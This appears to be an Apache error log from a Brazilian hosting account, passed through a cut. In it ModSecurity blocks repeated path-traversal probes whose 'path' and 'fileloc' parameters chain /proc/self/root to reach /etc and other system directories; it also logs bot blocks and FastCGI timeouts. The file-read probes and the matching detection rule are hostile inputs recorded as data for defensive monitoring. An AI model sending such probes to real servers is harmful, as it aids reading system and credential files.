[Tue Mar 17 21:29:45.528372 2026] [:error] [pid 26799:tid 140411716749056] [client 74.7.241.31:51014] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnx-da6ubjKNq_cu4YxCwAAA0M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 21:29:46.243236 2026] [core:alert] [pid 17653:tid 140411725141760] [client 74.7.243.128:43262] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/var/lib/yum/yumdb
[Tue Mar 17 21:29:59.337907 2026] [proxy_fcgi:error] [pid 17653:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:41938] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:30:21.157837 2026] [proxy_fcgi:error] [pid 11816:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:42524] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:30:42.229776 2026] [proxy_fcgi:error] [pid 6296:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:43176] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:30:52.269083 2026] [:error] [pid 19507:tid 140411725141760] [client 216.73.216.191:24551] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/netconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnyPNY0UrI5A3LftIwpxAAAAYI"]
[Tue Mar 17 21:31:07.146743 2026] [proxy_fcgi:error] [pid 17651:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:44038] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:31:31.665809 2026] [proxy_fcgi:error] [pid 11088:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:44660] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:31:53.045815 2026] [proxy_fcgi:error] [pid 6296:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:45526] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:32:16.149787 2026] [proxy_fcgi:error] [pid 29151:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:46276] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:32:24.554766 2026] [mime_magic:error] [pid 18057:tid 140411624429312] (70014)End of file found: [client 74.7.241.31:51028] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self
[Tue Mar 17 21:32:39.213785 2026] [proxy_fcgi:error] [pid 19507:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:46956] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:33:02.142313 2026] [proxy_fcgi:error] [pid 18142:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:48134] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:33:22.784048 2026] [:error] [pid 17653:tid 140411599251200] [client 74.7.241.31:54536] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abny0sdf6f5d65gmYZRoYwAAAtE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 21:33:23.053802 2026] [proxy_fcgi:error] [pid 18057:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:49178] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:33:26.880128 2026] [:error] [pid 17972:tid 140411658000128] [client 74.7.244.43:60736] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abny1oZ5-GlpYjVrXCrfwAAAAko"]
[Tue Mar 17 21:33:30.143656 2026] [:error] [pid 25836:tid 140411582465792] [client 74.7.241.31:38868] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abny2oh-PF_25v4hFRCVqwAAARM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 21:33:34.307377 2026] [:error] [pid 19507:tid 140411599251200] [client 74.7.228.61:34856] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abny3tY0UrI5A3LftIwp5QAAAZE"]
[Tue Mar 17 21:33:35.413286 2026] [:error] [pid 18211:tid 140411725141760] [client 74.7.241.31:59234] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abny3xcIZFNFgEhGGCRBsQAAA8I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 21:33:45.126893 2026] [proxy_fcgi:error] [pid 25836:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:49846] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:34:07.121776 2026] [proxy_fcgi:error] [pid 18142:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:50288] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:34:13.975005 2026] [mime_magic:error] [pid 18142:tid 140411691570944] (70014)End of file found: [client 74.7.241.31:59246] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/boot
[Tue Mar 17 21:34:30.133791 2026] [proxy_fcgi:error] [pid 25836:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:50654] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:34:43.494974 2026] [:error] [pid 17887:tid 140411733534464] [client 74.7.241.31:38136] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnzIwkwaGbbGflqUZCuJgAAAME"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 21:34:49.105286 2026] [:error] [pid 31803:tid 140411733534464] [client 216.73.216.191:12351] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/nsswitch.conf.rpmnew"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnzKeyqAr6etmhZHNpRiwAAAEE"]
[Tue Mar 17 21:34:52.029832 2026] [proxy_fcgi:error] [pid 17653:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:50998] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:35:15.133791 2026] [proxy_fcgi:error] [pid 29151:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:51306] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:35:38.157813 2026] [proxy_fcgi:error] [pid 6296:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:51798] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:35:49.431753 2026] [:error] [pid 11816:tid 140411607643904] [client 74.7.241.31:59032] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnzZew_le52K8_3pV13FwAAAhA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 21:36:01.153813 2026] [proxy_fcgi:error] [pid 11088:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:52402] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:36:24.121164 2026] [proxy_fcgi:error] [pid 19507:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:52888] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:36:46.961814 2026] [proxy_fcgi:error] [pid 17972:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:53216] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:37:09.037827 2026] [proxy_fcgi:error] [pid 26799:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:53604] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:37:31.113830 2026] [proxy_fcgi:error] [pid 2598:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:53950] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:37:54.129870 2026] [proxy_fcgi:error] [pid 19507:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:54346] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:38:17.129800 2026] [proxy_fcgi:error] [pid 25836:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:54698] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:38:20.654775 2026] [mime_magic:error] [pid 11816:tid 140411632822016] (70014)End of file found: [client 74.7.243.128:50100] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/var/lib/cloud/scripts
[Tue Mar 17 21:38:26.702084 2026] [:error] [pid 17972:tid 140411741927168] [client 74.7.243.128:49598] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn0AoZ5-GlpYjVrXCrgFgAAAkA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 21:38:27.903880 2026] [:error] [pid 17972:tid 140411725141760] [client 74.7.244.43:40180] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abn0A4Z5-GlpYjVrXCrgFwAAAkI"]
[Tue Mar 17 21:38:36.045206 2026] [:error] [pid 31803:tid 140411607643904] [client 74.7.228.61:36058] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abn0DOyqAr6etmhZHNpRyQAAAFA"]
[Tue Mar 17 21:38:39.133907 2026] [proxy_fcgi:error] [pid 31803:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:55098] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:38:46.730761 2026] [mime_magic:error] [pid 17653:tid 140411716749056] (70014)End of file found: [client 74.7.243.128:49604] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/usr/sbin
[Tue Mar 17 21:39:01.129827 2026] [proxy_fcgi:error] [pid 17887:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:55454] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:39:03.245061 2026] [:error] [pid 31803:tid 140411674785536] [client 74.7.243.128:55816] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn0J-yqAr6etmhZHNpR8gAAAEg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 21:39:23.129803 2026] [proxy_fcgi:error] [pid 18211:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:55834] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:39:31.437560 2026] [:error] [pid 25836:tid 140411716749056] [client 74.7.241.31:46152] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn0Qoh-PF_25v4hFRCWQgAAAQM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/run/initramfs/state/etc
[Tue Mar 17 21:39:45.125797 2026] [proxy_fcgi:error] [pid 25836:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:56236] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:39:46.210524 2026] [:error] [pid 17887:tid 140411708356352] [client 74.7.241.31:49892] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn0UgkwaGbbGflqUZCuoAAAAMQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/run/initramfs/state/etc
[Tue Mar 17 21:40:07.137828 2026] [proxy_fcgi:error] [pid 18211:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:56588] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:40:28.103509 2026] [proxy_fcgi:error] [pid 17972:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:57016] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:40:50.121226 2026] [proxy_fcgi:error] [pid 2598:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:57430] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:41:11.149787 2026] [proxy_fcgi:error] [pid 17653:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:57852] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:41:21.257665 2026] [:error] [pid 2598:tid 140411624429312] [client 74.7.243.128:35378] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn0sBj0p0SRWAqcjGGkaQAAAw4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 21:41:33.130366 2026] [proxy_fcgi:error] [pid 17653:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:58300] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:41:57.081833 2026] [proxy_fcgi:error] [pid 19507:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:58816] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:41:57.877020 2026] [:error] [pid 26799:tid 140411632822016] [client 74.7.243.128:59032] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn01da6ubjKNq_cu4Yx3wAAA00"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 21:42:20.129802 2026] [proxy_fcgi:error] [pid 31803:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:59346] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:42:23.374524 2026] [:error] [pid 17972:tid 140411666392832] [client 74.7.243.128:53478] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname 